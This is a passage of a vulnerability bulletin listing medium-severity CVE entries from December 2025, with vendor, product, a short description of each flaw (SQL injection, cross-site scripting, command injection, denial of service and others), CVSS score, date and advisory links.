| wpletsgo--WPLG Default Mail From | The WPLG Default Mail From plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14138 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fd24b087-83a7-4f9a-8f7a-1bd94332c1f7?source=cve https://plugins.trac.wordpress.org/browser/wplg-default-mail-from/trunk/wplg.php#L134 https://plugins.trac.wordpress.org/browser/wplg-default-mail-from/tags/1.0.0/wplg.php#L134 |
| ayothemes--Ayo Shortcodes | The Ayo Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'color' parameter of the ayo_action shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14143 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1760fe6e-8153-4479-ae32-2e2f0fa54e12?source=cve https://plugins.trac.wordpress.org/browser/ayo-shortcodes/trunk/includes/ayo-shortcodes-functions.php#L66 https://plugins.trac.wordpress.org/browser/ayo-shortcodes/trunk/includes/ayo-shortcodes-functions.php#L55 https://plugins.trac.wordpress.org/browser/ayo-shortcodes/tags/0.2/includes/ayo-shortcodes-functions.php#L55 https://plugins.trac.wordpress.org/browser/ayo-shortcodes/tags/0.2/includes/ayo-shortcodes-functions.php#L66 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 6.3 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to cause a Denial of Service condition by sending crafted API calls with large content parameters. | 2025-12-11 | 6.5 | CVE-2025-14157 | GitLab Issue #574324 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| SourceCodester--Online Student Clearance System | A vulnerability was determined in SourceCodester Online Student Clearance System 1.0. The affected element is an unknown function of the file /Admin/delete-fee.php of the component Fee Table Handler. Executing manipulation of the argument ID can lead to improper authorization. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2025-12-08 | 6.5 | CVE-2025-14206 | VDB-334649 | SourceCodester Online Student Clearance System Fee Table delete-fee.php improper authorization VDB-334649 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700465 | Sourcecodester Online Student Clearance System Project 1.0 /Admin/delete-fee.php Broken Access Control https://github.com/rassec2/dbcve/issues/8 https://www.sourcecodester.com/ |
| D-Link--DIR-823X | A security flaw has been discovered in D-Link DIR-823X up to 20250416. This affects the function sub_415028 of the file /goform/set_wan_settings. The manipulation of the argument ppp_username results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-08 | 6.3 | CVE-2025-14208 | VDB-334651 | D-Link DIR-823X set_wan_settings sub_415028 command injection VDB-334651 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700499 | D-Link DIR-823X 250416 Command Injection https://github.com/panda666-888/vuls/blob/main/d-link/dir-823x/set_wan_settings.md https://github.com/panda666-888/vuls/blob/main/d-link/dir-823x/set_wan_settings.md#poc https://www.dlink.com/ |
| itsourcecode--Student Information System | A vulnerability has been found in itsourcecode Student Information System 1.0. This affects an unknown part of the file /section_edit1.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 6.3 | CVE-2025-14214 | VDB-334656 | itsourcecode Student Information System section_edit1.php sql injection VDB-334656 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700986 | itsourcecode Student Information System V1.0 SQL Injection Submit #700987 | itsourcecode Student Information System V1.0 SQL Injection (Duplicate) https://github.com/ltranquility/CVE/issues/15 https://itsourcecode.com/ |
| code-projects--Employee Profile Management System | A flaw has been found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file /print_personnel_report.php. This manipulation of the argument per_id causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-12-08 | 6.3 | CVE-2025-14222 | VDB-334664 | code-projects Employee Profile Management System print_personnel_report.php sql injection VDB-334664 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701636 | code-projects Employee Profile Management System Project V1 print_personnel_report.php SQL injection V1 SQL Injection https://github.com/tiancesec/CVE/issues/14 https://code-projects.org/ |
| D-Link--DCS-930L | A vulnerability was determined in D-Link DCS-930L 1.15.04. This affects an unknown part of the file /setSystemAdmin of the component alphapd. Executing manipulation of the argument AdminID can lead to command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-08 | 6.3 | CVE-2025-14225 | VDB-334667 | D-Link DCS-930L alphapd setSystemAdmin command injection VDB-334667 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701774 | D-Link DCS930L v1.15.04 Command Injection https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-1/D-Link%20Vulnerability.md https://www.dlink.com/ |
| Philipinho--Simple-PHP-Blog | A security flaw has been discovered in Philipinho Simple-PHP-Blog up to 94b5d3e57308bce5dfbc44c3edafa9811893d958. This issue affects some unknown processing of the file /edit.php. The manipulation results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 6.3 | CVE-2025-14227 | VDB-334669 | Philipinho Simple-PHP-Blog edit.php sql injection VDB-334669 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701826 | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection https://github.com/woshinenbaba/CVE-/issues/1 |
| code-projects--Daily Time Recording System | A vulnerability was detected in code-projects Daily Time Recording System 4.5.0. The impacted element is an unknown function of the file /admin/add_payroll.php. Performing manipulation of the argument detail_Id results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-08 | 6.3 | CVE-2025-14230 | VDB-334672 | code-projects Daily Time Recording System add_payroll.php sql injection VDB-334672 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702426 | code projects Daily Time Recording System V4.5.0 SQL Injection https://github.com/woshilaiyi/cve/issues/6 https://code-projects.org/ |
| code-projects--Simple Shopping Cart | A vulnerability was found in code-projects Simple Shopping Cart 1.0. This vulnerability affects unknown code of the file /Customers/settings.php. Performing manipulation of the argument user_id results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-08 | 6.3 | CVE-2025-14246 | VDB-334756 | code-projects Simple Shopping Cart settings.php sql injection VDB-334756 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702461 | code-projects Simple Shopping Cart V1.0 SQL injection https://github.com/zzb1388/cve/issues/90 https://code-projects.org/ |
| code-projects--Simple Shopping Cart | A vulnerability was determined in code-projects Simple Shopping Cart 1.0. This issue affects some unknown processing of the file /Admin/additems.php. Executing manipulation of the argument item_name can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-08 | 6.3 | CVE-2025-14247 | VDB-334757 | code-projects Simple Shopping Cart additems.php sql injection VDB-334757 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702463 | code-projects Simple Shopping Cart V1.0 SQL injection https://github.com/zzb1388/cve/issues/91 https://code-projects.org/ |
| Galaxy Software Services--Vitals ESP | Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-12-08 | 6.5 | CVE-2025-14254 | https://www.twcert.org.tw/tw/cp-132-10542-4c682-1.html https://www.twcert.org.tw/en/cp-139-10543-380bd-2.html |
| Galaxy Software Services--Vitals ESP | Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-12-08 | 6.5 | CVE-2025-14255 | https://www.twcert.org.tw/tw/cp-132-10542-4c682-1.html https://www.twcert.org.tw/en/cp-139-10543-380bd-2.html |
| Jihai--Jshop MiniProgram Mall System | A vulnerability was found in Jihai Jshop MiniProgram Mall System 2.9.0. Affected by this issue is some unknown functionality of the file /index.php/api.html. The manipulation of the argument cat_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 6.3 | CVE-2025-14259 | VDB-334765 | Jihai Jshop MiniProgram Mall System api.html sql injection VDB-334765 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702613 | https://www.jihainet.com Jshop MiniProgram Mall System V2.9.0 SQL Injection http://101.200.76.102:38765/qwertyuiop/qwsdfvbnm/1/vuldb/Jshop/Jshop.html |
| htplugins--HT Slider For Elementor | The HT Slider for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slide_title' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping in JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-14278 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af580e5a-a9da-4516-b612-b544dc73cf23?source=cve https://plugins.trac.wordpress.org/browser/ht-slider-for-elementor/tags/1.7.4/assets/js/htslider-widgets.js#L223 https://plugins.trac.wordpress.org/browser/ht-slider-for-elementor/tags/1.7.4/include/addons/htslider_scroll_navigation.php#L1397 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3415988%40ht-slider-for-elementor&new=3415988%40ht-slider-for-elementor#file1 |
| n/a--@tiptap/extension-link | Versions of the package @tiptap/extension-link before 2.10.4 are vulnerable to Cross-site Scripting (XSS) due to unsanitized user input allowed in setting or toggling links. An attacker can execute arbitrary JavaScript code in the context of the application by injecting a javascript: URL payload into these attributes, which is then triggered by user interaction. | 2025-12-09 | 6.1 | CVE-2025-14284 | https://security.snyk.io/vuln/SNYK-JS-TIPTAPEXTENSIONLINK-14222197 https://gist.github.com/th4s1s/3d1b6cd3e7257b14947242f712ec6e1f https://github.com/ueberdosis/tiptap/commit/1c2fefe3d61ab1c8fbaa6d6b597251e1b6d9aaed https://github.com/ueberdosis/tiptap/releases/tag/v2.10.4 |
| wpjobportal--WP Job Portal AI-Powered Recruitment System for Company or Job Board website | The WP Job Portal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.4.0 via the 'downloadCustomUploadedFile' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-12-11 | 6.5 | CVE-2025-14293 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfcd264-39e3-44af-8e0e-5c35734524d0?source=cve https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/customfield/model.php#L908 |
| awanhrp--Wpik WordPress Basic Ajax Form | The Wpik WordPress Basic Ajax Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'dname' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14393 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1bc6508b-f646-4d52-bc8d-bdac443ed2fe?source=cve https://plugins.trac.wordpress.org/browser/wpik-wordpress-basic-ajax-form/tags/1.0/index.php#L84 https://plugins.trac.wordpress.org/browser/wpik-wordpress-basic-ajax-form/tags/1.0/index.php#L85 https://plugins.trac.wordpress.org/browser/wpik-wordpress-basic-ajax-form/tags/1.0/index.php#L107 https://developer.wordpress.org/plugins/security/data-validation/ https://developer.wordpress.org/plugins/security/securing-output/ https://cwe.mitre.org/data/definitions/79.html |
| ghozylab--Popup Builder | The Popup Builder (Easy Notify Lite) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the easynotify_cp_reset() function in all versions up to, and including, 1.1.37. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset plugin settings to their default values. | 2025-12-13 | 6.5 | CVE-2025-14446 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f67ab0cf-340d-4234-a857-1883f91c3ab6?source=cve https://plugins.trac.wordpress.org/browser/easy-notify-lite/trunk/inc/functions/enoty-functions.php#L304 https://plugins.trac.wordpress.org/browser/easy-notify-lite/tags/1.1.37/inc/functions/enoty-functions.php#L304 |
| yalogica--MediaCommander Bring Folders to Media, Posts, and Pages | The MediaCommander - Bring Folders to Media, Posts, and Pages plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the import-csv REST API endpoint in all versions up to, and including, 2.3.1. This is due to the endpoint using `upload_files` capability check (Author level) for a destructive operation that can delete all folders. This makes it possible for authenticated attackers, with Author-level access and above, to delete all folder organization data created by Administrators and other users. | 2025-12-13 | 6.5 | CVE-2025-14508 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9102fe7e-7baa-4bc0-879f-cc7df1ea13d2?source=cve https://plugins.trac.wordpress.org/browser/mediacommander/trunk/includes/Rest/Controllers/FoldersController.php#L127 https://plugins.trac.wordpress.org/browser/mediacommander/trunk/includes/Models/FoldersModel.php#L793 https://plugins.trac.wordpress.org/changeset/3417928/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in glib. This vulnerability allows a heap buffer overflow and denial-of-service (DoS) via an integer overflow in GLib's GIO (GLib Input/Output) escape_byte_string() function when processing malicious file or remote filesystem attribute values. | 2025-12-11 | 6.5 | CVE-2025-14512 | https://access.redhat.com/security/cve/CVE-2025-14512 RHBZ#2421339 |
| Yalantis--uCrop | A vulnerability was found in Yalantis uCrop 2.2.11. Affected by this issue is the function downloadFile of the file com.yalantis.ucrop.task.BitmapLoadTask.java of the component URL Handler. Performing manipulation results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 6.3 | CVE-2025-14516 | VDB-335854 | Yalantis uCrop URL com.yalantis.ucrop.task.BitmapLoadTask.java downloadFile server-side request forgery VDB-335854 | CTI Indicators (IOB, IOC, IOA) Submit #702810 | uCrop Android Library 2.2.11 Server-Side Request Forgery https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446 https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446?pvs=25#039fe30a92dc4ed88c9b03f85418e92e |
| n/a--PowerJob | A vulnerability was identified in PowerJob up to 5.1.2. This vulnerability affects the function checkConnectivity of the file src/main/java/tech/powerjob/common/utils/net/PingPongUtils.java of the component Network Request Handler. The manipulation of the argument targetIp/targetPort leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-11 | 6.3 | CVE-2025-14518 | VDB-335856 | PowerJob Network Request PingPongUtils.java checkConnectivity server-side request forgery VDB-335856 | CTI Indicators (IOB, IOC, IOA) Submit #702896 | PoweJob PowerJob <=5.1.2 SSRF https://github.com/PowerJob/PowerJob/issues/1144 https://github.com/PowerJob/PowerJob/issues/1144#issue-3673393002 |
| baowzh--hfly | A vulnerability was detected in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. The impacted element is an unknown function of the file /Public/Kindeditor/php/upload_json.php. Performing manipulation of the argument imgFile results in unrestricted upload. It is possible to initiate the attack remotely. The exploit is now public and may be used. This product uses a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 6.3 | CVE-2025-14522 | VDB-335860 | baowzh hfly upload_json.php unrestricted upload VDB-335860 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702950 | GitHub hfly 1.0 Stored Cross-Site Scripting https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20upload_json.php%20imgFile%20XSS-File-Upload.md |
| haxxorsid--Stock-Management-System | A security vulnerability has been detected in haxxorsid Stock-Management-System up to fbbbf213e9c93b87183a3891f77e3cc7095f22b0. This impacts an unknown function of the file model/User.php. The manipulation of the argument employee_id/id/admin leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-12 | 6.3 | CVE-2025-14568 | VDB-336192 | haxxorsid Stock-Management-System User.php sql injection VDB-336192 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703880 | haxxorsid stock-management-system 1.0 SQL Injection https://github.com/ixpqxi/CVE_LIST/blob/master/stock_management_system/sql_injection_vulnerability.md |
| TOTOLINK--X5000R | A vulnerability was determined in TOTOLINK X5000R 9.1.0cu.2089_B20211224. Affected by this issue is the function snprintf of the file /cgi-bin/cstecgi.cgi?action=exportOvpn&type=user. This manipulation of the argument User causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-13 | 6.3 | CVE-2025-14586 | VDB-336206 | TOTOLINK X5000R cstecgi.cgi snprintf os command injection VDB-336206 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705593 | TOTOLINK X5000R v9.1.0cu.2089_B20211224 RCE https://github.com/awigwu76/TOTOLINK_X5000R/blob/main/1.md https://www.totolink.net/ |
| code-projects--Prison Management System | A weakness has been identified in code-projects Prison Management System 2.0. This issue affects some unknown processing of the file /admin/search.php. Executing manipulation of the argument keyname can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. | 2025-12-13 | 6.3 | CVE-2025-14589 | VDB-336209 | code-projects Prison Management System search.php sql injection VDB-336209 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707094 | Yunlin: code-projects Prison Management System 2.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL18.md https://code-projects.org/ |
| OFFIS--DCMTK | A vulnerability was detected in OFFIS DCMTK up to 3.6.9. Affected by this issue is the function DcmByteString::makeDicomByteString of the file dcmdata/libsrc/dcbytstr.cc of the component dcmdata. The manipulation results in memory corruption. The attack can be launched remotely. Upgrading to version 3.7.0 can resolve this issue. The patch is identified as 4c0e5c10079392c594d6a7abd95dd78ac0aa556a. You should upgrade the affected component. | 2025-12-13 | 6.3 | CVE-2025-14607 | VDB-336283 | OFFIS DCMTK dcmdata dcbytstr.cc makeDicomByteString memory corruption VDB-336283 | CTI Indicators (IOB, IOC, IOA) Submit #705036 | OFFIS DCMTK 3.6.9 Buffer Overflow https://support.dcmtk.org/redmine/issues/1184 https://support.dcmtk.org/redmine/projects/dcmtk/activity?from=2025-12-02 https://github.com/DCMTK/dcmtk/commit/4c0e5c10079392c594d6a7abd95dd78ac0aa556a https://support.dcmtk.org/redmine/versions/19 |
| aizuda--snail-job | A vulnerability was found in aizuda snail-job up to 1.6.0. Affected by this vulnerability is the function QLExpressEngine.doEval of the file snail-job-common/snail-job-common-core/src/main/java/com/aizuda/snailjob/common/core/expression/strategy/QLExpressEngine.java. The manipulation results in injection. The attack can be launched remotely. Upgrading to version 1.7.0-beta1 addresses this issue. The patch is identified as 978f316c38b3d68bb74d2489b5e5f721f6675e86. The affected component should be upgraded. | 2025-12-14 | 6.3 | CVE-2025-14674 | VDB-336403 | aizuda snail-job QLExpressEngine.java QLExpressEngine.doEval injection VDB-336403 | CTI Indicators (IOB, IOC, TTP, IOA) https://gitee.com/aizuda/snail-job/issues/ICNUG0 https://gitee.com/aizuda/snail-job/issues/ICNUG0#note_44321424_link https://gitee.com/aizuda/snail-job/commit/978f316c38b3d68bb74d2489b5e5f721f6675e86 https://gitee.com/aizuda/snail-job/releases/tag/vsj1.7.0-beta1 |
| Infinera--MTC-9 | Improper input validation in the Netconf service in Infinera MTC-9 allows remote authenticated users to crash the service and reboot the appliance, thus causing a DoS condition, via crafted XML payloads. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 6.5 | CVE-2025-26489 | https://www.cve.org/CVERecord?id=CVE-2025-26489 |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow an authenticated user to cause a denial of service due to improper validation of a specified quantity size input. | 2025-12-08 | 6.5 | CVE-2025-36015 | https://www.ibm.com/support/pages/node/7253273 |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 stores unencrypted sensitive information in environmental variables files which can be obtained by an authenticated user. | 2025-12-08 | 6.5 | CVE-2025-36017 | https://www.ibm.com/support/pages/node/7253283 |
| IBM--watsonx.data | IBM watsonx.data 2.2 through 2.2.1 could allow an authenticated user to cause a denial of service through ingestion pods due to improper allocation of resources without limits. | 2025-12-08 | 6.5 | CVE-2025-36140 | https://www.ibm.com/support/pages/node/7253932 |
| Siemens--Gridscale X Prepay | A vulnerability has been identified in Gridscale X Prepay (All versions < V4.2.1). The affected application is vulnerable to capture-replay of authentication tokens. This could allow an authenticated but already locked-out user to establish still valid user sessions. | 2025-12-09 | 6.3 | CVE-2025-40807 | https://cert-portal.siemens.com/productcert/html/ssa-356310.html |
| Siemens--SINEC Security Monitor | A vulnerability has been identified in SINEC Security Monitor (All versions < V4.10.0). The affected application does not have proper authorization checks for the file_transfer feature in ssmctl-client command. This could allow an authenticated, lowly privileged local attacker to read or write to any file on server or sensor. | 2025-12-09 | 6.7 | CVE-2025-40830 | https://cert-portal.siemens.com/productcert/html/ssa-882673.html |
| Siemens--SINEC Security Monitor | A vulnerability has been identified in SINEC Security Monitor (All versions < V4.10.0). The affected application lacks input validation of date parameter in report generation functionality. This could allow an authenticated, lowly privileged attacker to cause denial of service condition of the report functionality. | 2025-12-09 | 6.5 | CVE-2025-40831 | https://cert-portal.siemens.com/productcert/html/ssa-882673.html |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.10 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to cause a denial of service condition by uploading specially crafted images. | 2025-12-11 | 6.5 | CVE-2025-4097 | GitLab Issue #538192 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| Phoenix Contact--FL SWITCH 2005 | A high privileged remote attacker with admin privileges for the webUI can brute-force the "root" and "user" passwords of the underlying OS due to a weak password generation algorithm. | 2025-12-09 | 6.8 | CVE-2025-41692 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | A low privileged remote attacker can run the webshell with an empty command containing whitespace. The server will then block until it receives more data, resulting in a DoS condition of the webserver. | 2025-12-09 | 6.5 | CVE-2025-41694 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An attacker can use an undocumented UART port on the PCB as a side-channel to get root access e.g. with the credentials obtained from CVE-2025-41692. | 2025-12-09 | 6.8 | CVE-2025-41697 | https://certvde.com/de/advisories/VDE-2025-071 |
| SAP_SE--SAP NetWeaver Enterprise Portal | Due to a Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal, an unauthenticated attacker could inject malicious scripts that execute in the context of other users' browsers, allowing the attacker to steal session cookies, tokens, and other sensitive information. As a result, the vulnerability has a low impact on confidentiality and integrity and no impact on availability. | 2025-12-09 | 6.1 | CVE-2025-42872 | https://me.sap.com/notes/3662622 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP NetWeaver Internet Communication Framework | The SAP Internet Communication Framework does not conduct any authentication checks for features that need user identification allowing an attacker to reuse authorization tokens, violating secure authentication practices causing low impact on Confidentiality, Integrity and Availability of the application. | 2025-12-09 | 6.6 | CVE-2025-42875 | https://me.sap.com/notes/3591163 https://url.sap/sapsecuritypatchday |
| SAP_SE--Application Server ABAP | Due to an Information Disclosure vulnerability in Application Server ABAP, an authenticated attacker could read unmasked values displayed in ABAP Lists. Successful exploitation could lead to unauthorized disclosure of data, resulting in a high impact on confidentiality without affecting integrity or availability. | 2025-12-09 | 6.5 | CVE-2025-42904 | https://me.sap.com/notes/3662324 https://url.sap/sapsecuritypatchday |
| Dell--Dell Encryption | Dell Encryption, versions prior to 11.12.1, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering. | 2025-12-09 | 6.6 | CVE-2025-46636 | https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442 |
| Fortinet--FortiSandbox Cloud | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSandbox version 5.0.0 through 5.0.2 and before 4.4.7 GUI allows a remote privileged attacker to execute unauthorized code or commands via crafted HTTP or HTTPS requests. | 2025-12-09 | 6.9 | CVE-2025-53679 | https://fortiguard.fortinet.com/psirt/FG-IR-25-454 |
| Fortinet--FortiPortal | An Incorrect Authorization vulnerability [CWE-863] in FortiPortal 7.4.0 through 7.4.5 may allow an authenticated attacker to reboot a shared FortiGate device via crafted HTTP requests. | 2025-12-09 | 6.4 | CVE-2025-54838 | https://fortiguard.fortinet.com/psirt/FG-IR-25-032 |
| Fortinet--FortiSOAR on-premise | An unverified password change vulnerability [CWE-620] in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.1, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an attacker who has already gained access to a victim's user account to reset the account credentials without being prompted for the account's password. | 2025-12-09 | 6.5 | CVE-2025-59808 | https://fortiguard.fortinet.com/psirt/FG-IR-25-599 |
| Fortinet--FortiSOAR on-premise | An improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.1, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow information disclosure to an authenticated attacker via crafted requests. | 2025-12-09 | 6.2 | CVE-2025-59810 | https://fortiguard.fortinet.com/psirt/FG-IR-25-601 |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and data on the server. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 6.8 | CVE-2025-61821 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system write. An attacker could exploit this vulnerability to write malicious files to arbitrary locations on the file system. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 6.2 | CVE-2025-61822 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. A high privileged attacker could exploit this vulnerability to access sensitive files and data on the server. Exploitation of this issue requires user interaction and scope is changed. | 2025-12-09 | 6.2 | CVE-2025-61823 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Microsoft--Windows Server 2022 | Null pointer dereference in Windows DirectX allows an authorized attacker to deny service locally. | 2025-12-09 | 6.5 | CVE-2025-62463 | DirectX Graphics Kernel Denial of Service Vulnerability |
| Microsoft--Windows Server 2022 | Null pointer dereference in Windows DirectX allows an authorized attacker to deny service locally. | 2025-12-09 | 6.5 | CVE-2025-62465 | DirectX Graphics Kernel Denial of Service Vulnerability |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. | 2025-12-09 | 6.5 | CVE-2025-62473 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability |
| Fortinet--FortiExtender | An improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.3, FortiExtender 7.4.0 through 7.4.7, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated attacker to execute unauthorized code or commands via a specific HTTP request. | 2025-12-09 | 6.7 | CVE-2025-64153 | https://fortiguard.fortinet.com/psirt/FG-IR-25-739 |
| Fortinet--FortiVoice | An improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7, FortiVoice 6.4 all versions, FortiVoice 6.0 all versions may allow an authenticated privileged attacker to execute unauthorized code or commands via crafted requests. | 2025-12-09 | 6.8 | CVE-2025-64156 | https://fortiguard.fortinet.com/psirt/FG-IR-25-362 |
